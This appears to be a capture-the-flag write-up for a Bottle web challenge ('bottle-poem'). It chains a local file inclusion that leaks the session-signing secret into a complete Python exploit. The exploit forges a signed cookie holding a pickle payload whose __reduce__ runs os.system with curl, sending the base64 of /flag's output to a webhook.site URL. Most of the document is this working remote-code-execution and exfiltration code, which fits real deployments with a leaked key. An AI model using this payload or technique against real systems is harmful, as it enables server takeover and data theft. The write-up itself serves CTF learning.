LFI: http://bottle-poem.ctf.sekai.team/show?id=/app/app.py /sign url uses some secret to create digital signature of a user session. http://bottle-poem.ctf.sekai.team/show?id=/app/config/secret.py reveals that secret. So, now we can create our own customized sessions. Viewing the src code of bottle:

def cookie_encode(data, key):
    ''' Encode and sign a pickle-able object. Return a (byte) string '''
    msg = base64.b64encode(pickle.dumps(data, -1))
    sig = base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())
    return tob('!') + sig + tob('?') + msg

There is usage of the pickle package which is vulnurable and allows RCE on deserialization.

The full code:

import base64
import hashlib
import hmac
import pickle
import requests

sekai = "Se3333KKKKKKAAAAIIIIILLLLovVVVVV3333YYYYoooouuu"
unicode = str


def tob(s, enc='utf8'):
    return s.encode(enc) if isinstance(s, unicode) else bytes(s)


def touni(s, enc='utf8', err='strict'):
    return s.decode(enc, err) if isinstance(s, bytes) else unicode(s)


def cookie_encode(data, key):
    ''' Encode and sign a pickle-able object. Return a (byte) string '''
    msg = base64.b64encode(pickle.dumps(data, -1))
    sig = base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())
    return tob('!') + sig + tob('?') + msg


class PickleRce(object):
    def __reduce__(self):
        return eval, ("os.system('curl https://webhook.site/REDACTED?p=`exec /flag | base64`')",)


payload = touni(cookie_encode(("name", {"name": PickleRce()}), sekai))
requests.get("http://bottle-poem.ctf.sekai.team/sign", cookies={"name": f"\"{payload}\""})